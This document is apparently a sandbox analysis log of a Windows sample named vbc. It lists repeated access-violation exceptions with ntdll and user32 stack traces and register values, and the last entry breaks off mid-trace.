__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe 